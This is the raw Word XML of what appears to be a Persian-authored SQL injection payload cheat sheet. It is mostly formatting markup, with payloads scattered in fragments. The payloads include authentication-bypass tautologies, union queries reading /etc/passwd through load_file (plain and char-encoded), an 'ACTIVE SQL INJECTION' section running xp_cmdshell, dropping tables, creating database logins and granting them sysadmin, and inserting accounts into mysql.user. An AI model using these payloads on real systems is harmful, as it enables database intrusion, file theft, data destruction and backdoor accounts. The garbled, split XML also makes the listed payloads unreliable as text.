    <w:p w14:paraId="47CB94AA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'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD68D44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'; EXEC ('SEL' + 'ECT US' + 'ER') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03452BC9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'/**/OR/**/1/**/=/**/1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3C4A7E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or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1/* +or+isnull%281%2F0%29+%2F* </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E209B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%27+OR+%277659%27%3D%277659 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244847C1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%22+or+isnull%281%2F0%29+%2F* </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B31BB90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%27+--+&amp;password= </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103BBFD6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lastRenderedPageBreak/>
        <w:t>'; begin declare @</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>varchar(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>8000) set @</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>=':' select @</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>=@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">+'+login+'/'+password+' ' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1DCB85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from</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> users where login &gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6333F128" w14:textId="078991B1" w:rsidR="007F3F38" w:rsidRPr="007F3F38" w:rsidRDefault="005F7587" w:rsidP="007F3F38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F3F38" w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F3F38" w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F3F38" w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> select @</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F3F38" w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F3F38" w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F3F38" w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F3F38" w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> into temp end -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB7775A" w14:textId="77777777" w:rsidR="007F3F38" w:rsidRPr="007F3F38" w:rsidRDefault="007F3F38" w:rsidP="007F3F38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A6FA42" w14:textId="7041AA47" w:rsidR="005F7587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and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 in (select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> from temp)</w:t>
      </w:r>
      <w:r w:rsidR="005F7587">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6063BA0A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7F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>' union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1,load_file('/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">'),1,1,1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E63F9" w14:textId="6CE4FC1A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1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC984B7" w14:textId="68BE1CCC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' and 1=( if((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>load_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73809EF6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</w:p>
    <w:p w14:paraId="285F4BF7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</w:p>
    <w:p w14:paraId="6AC9C0D0" w14:textId="712354FF" w:rsidR="00073657" w:rsidRPr="00073657" w:rsidRDefault="00073657" w:rsidP="00073657">
      <w:pPr>
        <w:jc w:val="center"/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rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073657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bidi="fa-IR"/>
        </w:rPr>
        <w:t>ACTIVE SQL INJECTION (SQI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F6E9BE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</w:p>
    <w:p w14:paraId="1371F35F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</w:p>
    <w:p w14:paraId="6BCAC11D" w14:textId="3895B008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>'; exec master</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'ping 10.10.1.2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618EE4EB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 xml:space="preserve">CRATE USER name IDENTIFIED BY 'pass123' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BB789B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 xml:space="preserve">CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155F84A" w14:textId="33B10C87" w:rsidR="00073657" w:rsidRDefault="00073657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073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>' ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> drop table temp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3A6CFD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073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>sp_addlogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'name' , 'password' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E8601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073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>sp_addsrvrolemember</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'name' , 'sysadmin' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209A606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 xml:space="preserve">INSERT INTO </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>mysql.user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (user, host, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">) VALUES ('name', 'localhost', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0472A64A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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>PASSWORD(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00073657">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">'pass123')) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79303D5D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 xml:space="preserve">GRANT CONNECT TO name; GRANT RESOURCE TO name; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159232B8" w14:textId="4AAF16BD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>INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70)   + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B080F5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</w:p>
    <w:p w14:paraId="224FEEC1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</w:p>
    <w:p w14:paraId="6F871AFB" w14:textId="77777777" w:rsidR="00073657" w:rsidRPr="007F3F38" w:rsidRDefault="00073657" w:rsidP="007F3F38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00073657" w:rsidRPr="007F3F38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MehDi Hoseini" w:date="2018-06-27T14:14:00Z" w:initials="MH">
    <w:p w14:paraId="53D728D9" w14:textId="77777777" w:rsidR="00216967" w:rsidRDefault="00216967">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fuzz = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>نامشخص</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0046F91C" w14:textId="77777777" w:rsidR="00216967" w:rsidRDefault="00216967">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="00CB51FC">
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>example: to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>day is a hot day is a fuzzy sentence, because it may be cold for someone else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCF4658" w14:textId="77777777" w:rsidR="00216967" w:rsidRDefault="00216967">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
  </w:comment>
  <w:comment w:id="2" w:author="MehDi Hoseini" w:date="2018-06-27T15:29:00Z" w:initials="MH">
    <w:p w14:paraId="53CA6706" w14:textId="77777777" w:rsidR="00CB51FC" w:rsidRDefault="00CB51FC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DCF4658" w15:done="0"/>
  <w15:commentEx w15:paraId="53CA6706" w15:paraIdParent="3DCF465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2B9B91" w14:textId="77777777" w:rsidR="00190F47" w:rsidRDefault="00190F47" w:rsidP="006571BB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="640031D8" w14:textId="77777777" w:rsidR="00190F47" w:rsidRDefault="00190F47" w:rsidP="00657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783212" w14:textId="77777777" w:rsidR="00190F47" w:rsidRDefault="00190F47" w:rsidP="006571BB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1A7F482C" w14:textId="77777777" w:rsidR="00190F47" w:rsidRDefault="00190F47" w:rsidP="006571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427FEA" w14:textId="77777777" w:rsidR="006571BB" w:rsidRDefault="006571BB">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:hint="cs"/>
        <w:lang w:bidi="fa-IR"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="cs"/>
        <w:rtl/>
        <w:lang w:bidi="fa-IR"/>
      </w:rPr>
      <w:t>‍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72F5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D9ACD36"/>
    <w:lvl w:ilvl="0" w:tplc="E7704B46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31AD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="811C9A2C"/>
    <w:lvl w:ilvl="0" w:tplc="E7704B46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B169E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6D67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F2774"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E51CEA26"/>
    <w:lvl w:ilvl="0" w:tplc="E7704B46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22E70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A642F14"/>
    <w:lvl w:ilvl="0" w:tplc="E7704B46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9F543B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="646C1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4964D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CDFCC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E20F6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59F20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3412A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2CBA6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C40376"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFCAD714"/>
    <w:lvl w:ilvl="0" w:tplc="E7704B46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975787"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="540018CC"/>
    <w:lvl w:ilvl="0" w:tplc="E7704B46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F84F83"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11C8A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7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="1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ehDi Hoseini">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="bc1b1c93d636c3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0F4"/>
    <w:rsid w:val="00000943"/>
    <w:rsid w:val="000062B9"/>
    <w:rsid w:val="00020C31"/>
    <w:rsid w:val="00042390"/>
    <w:rsid w:val="00057D75"/>
    <w:rsid w:val="00073657"/>
    <w:rsid w:val="00082506"/>
    <w:rsid w:val="00082C81"/>
    <w:rsid w:val="000932D8"/>
    <w:rsid w:val="000B35EE"/>
    <w:rsid w:val="00121A89"/>
    <w:rsid w:val="001732B1"/>
    <w:rsid w:val="00190F47"/>
    <w:rsid w:val="00192D55"/>
    <w:rsid w:val="001C0920"/>
    <w:rsid w:val="001D73BB"/>
    <w:rsid w:val="001E0199"/>
    <w:rsid w:val="00216967"/>
    <w:rsid w:val="00226556"/>
    <w:rsid w:val="00227F56"/>
    <w:rsid w:val="00235FC4"/>
    <w:rsid w:val="002561D4"/>
    <w:rsid w:val="002773C8"/>
    <w:rsid w:val="002A6B23"/>
    <w:rsid w:val="002F5E41"/>
    <w:rsid w:val="00360609"/>
    <w:rsid w:val="0036594F"/>
    <w:rsid w:val="0038135A"/>
    <w:rsid w:val="003C1DE7"/>
    <w:rsid w:val="003D0575"/>
    <w:rsid w:val="003D3779"/>
    <w:rsid w:val="003D5367"/>
    <w:rsid w:val="003F3847"/>
    <w:rsid w:val="00453802"/>
    <w:rsid w:val="00476DCD"/>
    <w:rsid w:val="004856EC"/>
    <w:rsid w:val="004A1E08"/>
    <w:rsid w:val="004A5447"/>
    <w:rsid w:val="004A71CF"/>
    <w:rsid w:val="004B5E0E"/>
    <w:rsid w:val="004C102E"/>
    <w:rsid w:val="004D2C96"/>
    <w:rsid w:val="0055516A"/>
    <w:rsid w:val="0055731C"/>
    <w:rsid w:val="00563843"/>
    <w:rsid w:val="00567131"/>
    <w:rsid w:val="005963D0"/>
    <w:rsid w:val="005B4396"/>
    <w:rsid w:val="005D53EB"/>
    <w:rsid w:val="005F7587"/>
    <w:rsid w:val="006311DF"/>
    <w:rsid w:val="006571BB"/>
    <w:rsid w:val="0066288E"/>
    <w:rsid w:val="006635D8"/>
    <w:rsid w:val="0067622E"/>
    <w:rsid w:val="0068617C"/>
    <w:rsid w:val="006A2DDC"/>
    <w:rsid w:val="006E51EC"/>
    <w:rsid w:val="006E6A5F"/>
    <w:rsid w:val="00712D59"/>
    <w:rsid w:val="00723F19"/>
    <w:rsid w:val="00787459"/>
    <w:rsid w:val="007B6E30"/>
    <w:rsid w:val="007D3451"/>
    <w:rsid w:val="007F3F38"/>
    <w:rsid w:val="0082563A"/>
    <w:rsid w:val="00836142"/>
    <w:rsid w:val="0085183F"/>
    <w:rsid w:val="00856802"/>
    <w:rsid w:val="0087583F"/>
    <w:rsid w:val="008822F0"/>
    <w:rsid w:val="0089126A"/>
    <w:rsid w:val="008C6CE1"/>
    <w:rsid w:val="008D0C82"/>
    <w:rsid w:val="009355EA"/>
    <w:rsid w:val="009660A7"/>
    <w:rsid w:val="00977F11"/>
    <w:rsid w:val="009B340C"/>
    <w:rsid w:val="009B34B8"/>
    <w:rsid w:val="00A46606"/>
    <w:rsid w:val="00A5698D"/>
    <w:rsid w:val="00A819B6"/>
    <w:rsid w:val="00A85481"/>
